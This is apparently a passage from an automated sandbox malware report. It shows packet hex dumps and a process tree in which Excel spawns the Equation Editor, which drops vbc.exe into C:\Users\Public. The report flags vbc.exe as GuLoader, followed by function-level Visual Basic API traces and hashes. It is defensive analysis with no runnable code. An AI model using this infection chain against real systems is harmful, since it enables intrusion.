Jul 21, 2021 08:30:41.746360064 CEST	8	IN	Data Raw: 88 33 bb bb b0 00 00 00 00 00 00 00 8b bb bb bb bb bb 00 00 00 00 00 77 88 83 3b bb b0 00 00 00 00 00 00 00 0b bb bb bb bb bb 80 00 00 00 0b 78 88 83 3b bb 00 00 00 00 00 00 00 00 00 8b bb bb bb bb b0 00 00 00 8b 88 88 83 bb b0 00 00 00 00 00 00 Data Ascii: 3w;x;s?
Jul 21, 2021 08:30:41.746391058 CEST	10	IN	Data Raw: 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 Data Ascii:
Jul 21, 2021 08:30:41.746416092 CEST	11	IN	Data Raw: 56 e5 f1 00 59 e5 f0 00 5d e5 f2 00 58 e5 fb 00 5e e6 fb 00 50 e9 fc 00 56 e9 fd 00 5d e9 fc 00 62 e1 f7 00 66 e2 f6 00 63 e5 fa 00 6b ea fb 00 69 ea fc 00 7b e2 f6 00 79 e8 f2 00 72 e2 fb 00 78 e3 fb 00 7e e5 fb 00 74 eb fb 00 73 eb fc 00 76 e9 Data Ascii: VY]X^PV]bfcki{yrx~tsvq{}
Jul 21, 2021 08:30:41.746629000 CEST	13	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 4b 4f 4f 51 45 25 22 00 00 00 00 00 00 4f 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 51 51 51 51 4b 25 18 00 00 00 00 00 00 4b 4b 4b 4b 4b Data Ascii: KKKKKKKOOQE%"OKKKKKKKKKKK+KKKKKKQQQQK%KKKKKKKKKKKO%KKKKKQQQQQQ%KKKKKKKKKQQQ%KKKOQQQQQQQ%KKKKKKKOQQQQ%KOQQQQQQQQQ+KKKKKKOQQQQQ%
Jul 21, 2021 08:30:41.746655941 CEST	14	IN	Data Raw: 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 5a 2d 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 88 88 88 88 88 88 88 88 88 88 88 7f 51 41 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z-<QAg???????
Jul 21, 2021 08:30:41.746682882 CEST	15	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2796 Parent PID: 584

General

Start time:	08:29:39
Start date:	21/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13ff70000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 552 Parent PID: 584

General

Start time:	08:30:01
Start date:	21/07/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2708 Parent PID: 552

General

Start time:	08:30:04
Start date:	21/07/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	246888 bytes
MD5 hash:	19CAC1EE3A6E5E9F83054616F5D5CE6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus matches:	Detection: 15%, Virustotal, Browse
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2708 Parent PID: 552 vbc.exeCOMMON

Executed Functions

Function 002F53FF, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002F5594

Strings

G\', xrefs: 002F55EC
n, xrefs: 002F54D9
$2, xrefs: 002F55F2

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: $2$G\'$n
API String ID: 2167126740-3582581101
Opcode ID: 54ff3a137cfe36bc263f9d6212e469e8a5d29b1298d080fda841df0197a415ae
Instruction ID: 26316604721111775c1d01d5f9c155631efae7871b871a6a31705de6f90411db
Opcode Fuzzy Hash: 54ff3a137cfe36bc263f9d6212e469e8a5d29b1298d080fda841df0197a415ae
Instruction Fuzzy Hash: 165160B16283898FDB609E38C8917EEB7E2EF4A350F55052DDD89DB210D7318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002F53FB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002F5594

Strings

G\', xrefs: 002F55EC
n, xrefs: 002F54D9
$2, xrefs: 002F55F2

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: $2$G\'$n
API String ID: 2167126740-3582581101
Opcode ID: aad8d4b231e79fd626d3e4844aacfb6238815ecb8e7034c5770fd6f3affad00c
Instruction ID: c480ba5134d17a38e8da9abf76204f388e0130765e1329625bf35d98ea64c05e
Opcode Fuzzy Hash: aad8d4b231e79fd626d3e4844aacfb6238815ecb8e7034c5770fd6f3affad00c
Instruction Fuzzy Hash: B55122B16283498FDB709E28C8957EE73E6EF49340F55452DDE89DB210D3319A85CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002F5541, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002F5594

Strings

G\', xrefs: 002F55EC
n, xrefs: 002F54D9
$2, xrefs: 002F55F2

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: $2$G\'$n
API String ID: 2167126740-3582581101
Opcode ID: b285d58cff5a6016e82bc75fd2b5aecd238452ca7577edf0d0e7916096feabd8
Instruction ID: c18714b980a257b3738ecd82b6a4c907b7320fe0784e0bd415fd34e394ea66d6
Opcode Fuzzy Hash: b285d58cff5a6016e82bc75fd2b5aecd238452ca7577edf0d0e7916096feabd8
Instruction Fuzzy Hash: 3C418BB1515758CFCB709F34CC957EABBB2EF09750F44052EEA499B221D3318A84DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00430BC4, Relevance: 223.5, APIs: 116, Strings: 11, Instructions: 1298COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,spearproof), ref: 00430D03
__vbaSetSystemError.MSVBVM60(00000000,?,spearproof), ref: 00430D14
__vbaFreeStr.MSVBVM60(00000000,?,spearproof), ref: 00430D33
#610.MSVBVM60(?,00000000,?,spearproof), ref: 00430D48
#552.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D5D
__vbaVarMove.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D6E
__vbaFreeVar.MSVBVM60(?,?,00000001,?,00000000,?,spearproof), ref: 00430D79
__vbaNew2.MSVBVM60(0042F948,00434454,?,?,00000001,?,00000000,?,spearproof), ref: 00430D90
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000044), ref: 00430E5D
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00430E96
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00430EA1
__vbaNew2.MSVBVM60(0042FCD4,`S`,00000000,?,spearproof), ref: 00430EBC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00430EDC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000108), ref: 00430F05
__vbaStrToAnsi.MSVBVM60(?,?), ref: 00430F17
__vbaStrToAnsi.MSVBVM60(?,Laanemuligheder4,00000000,?,?), ref: 00430F29
__vbaSetSystemError.MSVBVM60(00000000,?,Laanemuligheder4,00000000,?,?), ref: 00430F3A
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Laanemuligheder4,00000000,?,?), ref: 00430F6A
__vbaFreeObj.MSVBVM60(?), ref: 00430F78
__vbaNew2.MSVBVM60(0042F948,00434454,?), ref: 00430F9A
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000014), ref: 00430FC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F990,000000D0), ref: 00430FF0
__vbaStrMove.MSVBVM60(00000000,?,0042F990,000000D0), ref: 00431007
__vbaFreeObj.MSVBVM60(00000000,?,0042F990,000000D0), ref: 00431012
__vbaNew2.MSVBVM60(0042F948,00434454), ref: 00431029
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,0000001C), ref: 00431050
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9A0,0000005C,?,?,?,?,?), ref: 0043109C
__vbaStrMove.MSVBVM60(?,?,?,?,?), ref: 004310B4
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004310BF
__vbaNew2.MSVBVM60(0042FCD4,`S`,?), ref: 004310D9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004310F4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9B0,000000F0), ref: 0043111D
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 0043112D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431148
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9C0,000000E8), ref: 00431171
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00431181
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043119C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000130), ref: 004311C5
__vbaStrMove.MSVBVM60(00000000,00000000,0042F980,00000130), ref: 004311DD
__vbaStrCopy.MSVBVM60(00000000,00000000,0042F980,00000130), ref: 004311ED
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F488,000006F8), ref: 0043124F
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0043126B
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,00000003,?,?,?), ref: 00431287
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 0043129A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004312B5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9E8,00000110), ref: 004312DE
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 004312EE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431309
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9B0,000000F8), ref: 00431334
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00431344
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043135F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9E8,00000138), ref: 00431388
__vbaStrCopy.MSVBVM60(00000000,00000000,0042F9E8,00000138), ref: 00431398
__vbaStrMove.MSVBVM60(00000000,00000000,0042F9E8,00000138), ref: 004313B0
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F488,000006F8), ref: 00431412
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0043142E
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,00000003,?,?,?), ref: 0043144A
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 0043145D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00431478
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000068), ref: 0043149B
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 004314AB
__vbaObjSet.MSVBVM60(?,00000000), ref: 004314C6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9B0,00000060), ref: 004314E9
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00182DD5,?), ref: 00431584
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,00182DD5,?), ref: 00431597
__vbaObjSet.MSVBVM60(?,00000000,?,00182DD5,?), ref: 004315B2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA10,00000060,?,00182DD5,?), ref: 004315D5
__vbaFreeObj.MSVBVM60(?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043163C
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043164C
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431667
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000150,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431690
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316A0
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316BB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000070,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316DE
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004316EE
__vbaObjSet.MSVBVM60(?,00000000,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431709
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9C0,00000080,?,00518CAF,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431732
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,C,?,00518CAF,?,?,4B7FFB7C,?), ref: 004317AE
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004317C1
__vbaObjSet.MSVBVM60(?,00000000,?,4B7FFB7C,?,?,00182DD5,?), ref: 004317DC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9B0,00000160,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431805
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431815
__vbaObjSet.MSVBVM60(?,00000000,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431830
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000080,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431859
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F488,000006FC,?,4B7FFB7C,?,?,00182DD5,?), ref: 004318E6
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004318FB
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043190E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431929
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000070,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043194C
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 0043195C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431977
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9C0,000001C0,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319A0
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319B0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319CB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA38,000000D0,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 004319F4
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F488,000006FC,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431A81
__vbaFreeStr.MSVBVM60(?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431A8C
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AA8
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431ABB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431AD6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000070,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431AF9
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431B09
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5,?), ref: 00431B24
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000080,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431B4D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,007F5A39,39BD99C0,?,?,?), ref: 00431BBE
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431BD1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431BEC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9E8,00000060,?,?,?), ref: 00431C0F
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431C1F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?), ref: 00431C3A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000170,?,?,?), ref: 00431C63
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5), ref: 00431C7B
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C,?,?,00182DD5), ref: 00431C8B
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,0042F488,000006F8,?,?,?), ref: 00431CED
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,4B7FFB7C), ref: 00431D02
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000002,00000000,?,?,?,?), ref: 00431D17

Strings

Sprogede6, xrefs: 00431874
Lineality, xrefs: 004311E2
Laanemuligheder4, xrefs: 00430F1D
4, xrefs: 0043155A
REFUSIONSSALDOERS, xrefs: 00431C80
spearproof, xrefs: 00430C1F
CORANTO, xrefs: 00431CBD
Grilleres, xrefs: 0043138D
`S`, xrefs: 00430EA8, 00430EAF, 00430EB6, 00430EC1, 004310C4, 004310CE, 004310D7, 004310DE, 00431122, 0043112B, 00431132, 00431176, 0043117F, 00431186, 0043128C, 00431298, 0043129F, 004312E3, 004312EC, 004312F3, 00431339, 00431342, 00431349, 0043144F, 0043145B, 00431462, 004314A0, 004314A9, 004314B0, 00431589, 00431595, 0043159C, 00431641, 0043164A, 00431651, 00431695, 0043169E, 004316A5, 004316E3, 004316EC, 004316F3, 004317B3, 004317BF, 004317C6, 0043180A, 00431813, 0043181A, 00431900, 0043190C, 00431913, 00431951, 0043195A, 00431961, 004319A5, 004319AE, 004319B5, 00431AAD, 00431AB9, 00431AC0, 00431AFE, 00431B07, 00431B0E, 00431BC3, 00431BCF, 00431BD6, 00431C14, 00431C1D, 00431C24
Codi, xrefs: 00430E25
C, xrefs: 0043175B, 00431761

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free$List$Move$AnsiCopy$ErrorSystem$#552#610Late
String ID: C$CORANTO$Codi$Grilleres$Laanemuligheder4$Lineality$REFUSIONSSALDOERS$Sprogede6$`S`$spearproof$4
API String ID: 2238139552-500532440
Opcode ID: 09eef0bb9f018b44a7b8ec807f7c7675c362f6b57c32d8b81c5d5f02f2132548
Instruction ID: b0ff59b7ee0f7c146334848be2af030ff7e32bc7879a59961dd64c287c7e4b1b
Opcode Fuzzy Hash: 09eef0bb9f018b44a7b8ec807f7c7675c362f6b57c32d8b81c5d5f02f2132548
Instruction Fuzzy Hash: CDB25EB1A00618AFDB20DB65CC45FEA77BCAF48344F0001EEB549F7191DB78AA458F68

Uniqueness

Uniqueness Score: -1.00%

Function 00432BD5, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00432C27
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00432C3F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432C57
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,000001C8), ref: 00432C93
__vbaFreeObj.MSVBVM60 ref: 00432C9B
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00432CB3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432CCB
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,00000000), ref: 00432CF3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432D0B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9C0,00000150), ref: 00432D31
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9B0,000001EC), ref: 00432D60
__vbaFreeStr.MSVBVM60 ref: 00432D68
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00432D79
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432D94
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432D9E
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00432DA6
__vbaFreeStr.MSVBVM60(00432DEE,?,000000FF,000000FE,000000FE,000000FE), ref: 00432DE0
__vbaFreeStr.MSVBVM60(00432DEE,?,000000FF,000000FE,000000FE,000000FE), ref: 00432DE8

Strings

`S`, xrefs: 00432C2C, 00432C35, 00432C44, 00432CA0, 00432CA9, 00432CB8, 00432CD2, 00432CE9, 00432CF8

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultNew2$#704CopyListMove
String ID: `S`
API String ID: 3420054063-1806859773
Opcode ID: f59f0f4899c58369533f0b9c9598eb36b75edb2da98aa1915a874e1cbafd727c
Instruction ID: 26a3dfeb4a146d5252217d22b066094ff945cc9a3714c27da0ce0bd2adb3b113
Opcode Fuzzy Hash: f59f0f4899c58369533f0b9c9598eb36b75edb2da98aa1915a874e1cbafd727c
Instruction Fuzzy Hash: A1516271A00218ABCB04EFA6D985FDE77B8BF08704F50416EF511F71E1DB7869058B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401330, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 00401335

Strings

VB5!6%*, xrefs: 00401330

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: fd12bdea4db60704e0e4ff75a8f6b5447b1c2ce97e30c668d4ffc6172e01bd03
Instruction ID: db10775f9613a9cef7dfcb640d259d2a3f3745c2cc7a99156764660d0f41b3f6
Opcode Fuzzy Hash: fd12bdea4db60704e0e4ff75a8f6b5447b1c2ce97e30c668d4ffc6172e01bd03
Instruction Fuzzy Hash: AE7193A144E7C05FD3038BB498296A13FB0AE53229B4F45EBC4C1DF4F3E269180AD766

Uniqueness

Uniqueness Score: -1.00%

Function 002212F5, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351573361.0000000000220000.00000020.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63bca635af9bac78c8747cfb77a1dd70239b7d70636c181bb03ca7e4bd558d9
Instruction ID: 80a24a4959eb44ad5e1dfaba8d93af43ebc40a4906516381e83a38260539d616
Opcode Fuzzy Hash: c63bca635af9bac78c8747cfb77a1dd70239b7d70636c181bb03ca7e4bd558d9
Instruction Fuzzy Hash: D8D05EB130E380AFD349DB288D269967FF0AF87211B0D49EEE184CB293E615AC558752

Uniqueness

Uniqueness Score: -1.00%

Function 0042F860, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72f7b94b8f26f587679a8bf1b5dadee1532e28c7b24ae92f1f0baff111dad7e
Instruction ID: 89b52c948480378e4f8d01a45c640e99590afb59a4cd7219fcf44060605338ab
Opcode Fuzzy Hash: d72f7b94b8f26f587679a8bf1b5dadee1532e28c7b24ae92f1f0baff111dad7e
Instruction Fuzzy Hash: E1B012103841119A57007254BD8192451A0D2813843F00C33F401F2290C728DD04C22E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8B8, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb22eaf74145d6885aeee790a5b7451da9c8c52253a287ba4f476fd65a6998d
Instruction ID: 695da97cfa436c67d5b5d8ea5b8f3c9cf75e32bc5114b6d39dbb6159547e7a0d
Opcode Fuzzy Hash: 8fb22eaf74145d6885aeee790a5b7451da9c8c52253a287ba4f476fd65a6998d
Instruction Fuzzy Hash: BFB012243941119B6B0072947C42D2153A0EBC47843E40C73F011E11D0D728EC08452D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002F293F, Relevance: 5.5, Strings: 3, Instructions: 1754COMMON

Download Yara Rule

Strings

/wyh, xrefs: 002F9091
